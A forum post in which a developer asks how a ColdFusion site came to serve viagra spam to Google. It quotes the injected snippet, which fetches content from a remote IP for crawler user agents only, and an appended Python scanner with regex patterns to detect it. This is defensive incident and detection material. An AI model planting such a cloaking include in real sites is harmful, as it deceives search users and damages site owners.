Recently a site of ours got hacked - basically, a Google search of the site 
was returning viagra info!
What we got was a small script added to the end of a functions.cfm file:

<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) />
<cfif (Find( "google", REQUEST.UserAgent )) >
<cfhttp method="get" url="http://168.16.228.250/fms/">
<cfoutput>#cfhttp.filecontent#</cfoutput>
</cfif>

I'm not the server admin for this site, so they're sorta pointing the 
finger at us developers, and we're pointing fingers back at them about 
lax server security. We've got a boatload of stuff on this site to 
prevent SQL injection, including Justin D. Scott's application script, 
carefully checking anything that goes into the database, client and server 
side form validation, blah, blah, blah...

Anybody seen the above, and if so, thoughts? Anybody manage to determine 
how the exploit happened to start with?
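
Added example, not part of the original post: a Python scanner that walks a ColdFusion webroot and flags templates matching the shape of the snippet above (a CGI.http_user_agent check for a crawler name, a cfhttp fetch, and the fetched body echoed with #cfhttp.filecontent#). The function names, the heuristics and the sample templates are assumptions constructed for this example; the sample uses a documentation-range IP.

```python
import re
from pathlib import Path

# Heuristics for the crawler-conditional include shown in the post (assumed, tune per site).
UA_REF = re.compile(r"cgi\.http_user_agent", re.I)
CRAWLER = re.compile(r"[\"'](google|bing|yahoo|slurp|spider)", re.I)
CFHTTP_URL = re.compile(r"<cfhttp\b[^>]*\burl\s*=\s*[\"']([^\"']+)[\"']", re.I | re.S)
ECHO = re.compile(r"#\s*cfhttp\.filecontent\s*#", re.I)
IP_HOST = re.compile(r"^https?://\d{1,3}(\.\d{1,3}){3}([:/]|$)", re.I)

# Constructed samples: an infected template (TEST-NET address) and a legitimate cfhttp call.
SAMPLE_INFECTED = '''<cffunction name="fmt"><cfreturn 1></cffunction>
<cfset REQUEST.UserAgent = LCase( CGI.http_user_agent ) /><cfif (Find( "google", REQUEST.UserAgent )) >
<cfhttp method="get" url="http://203.0.113.10/fms/"><cfoutput>#cfhttp.filecontent#</cfoutput></cfif>
'''
SAMPLE_CLEAN = '''<cfhttp method="get" url="https://api.example.com/rates" result="r">
<cfset rates = DeserializeJSON(r.filecontent)>
'''

def scan_text(text):
    """Return a list of findings for one CFML source string."""
    findings = []
    urls = CFHTTP_URL.findall(text)
    ua = bool(UA_REF.search(text) and CRAWLER.search(text))
    echo = bool(ECHO.search(text))
    if ua and urls and echo:
        findings.append("crawler-conditional remote include")
    for u in urls:
        if IP_HOST.match(u):
            findings.append("cfhttp to bare IP: " + u)
    # The post's snippet was appended to the end of an existing file.
    if CFHTTP_URL.search(text.rstrip()[-400:]) and echo:
        findings.append("cfhttp block at end of file")
    return findings

def scan_tree(root, exts=(".cfm", ".cfc", ".cfml")):
    """Scan every CFML file under root; return {path: findings} for flagged files."""
    hits = {}
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            found = scan_text(p.read_text(errors="replace"))
            if found:
                hits[str(p)] = found
    return hits

if __name__ == "__main__":
    print(scan_text(SAMPLE_INFECTED))
```

Comparing the modification times of flagged files against web and FTP access logs is the usual next step for working out how the file was written.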

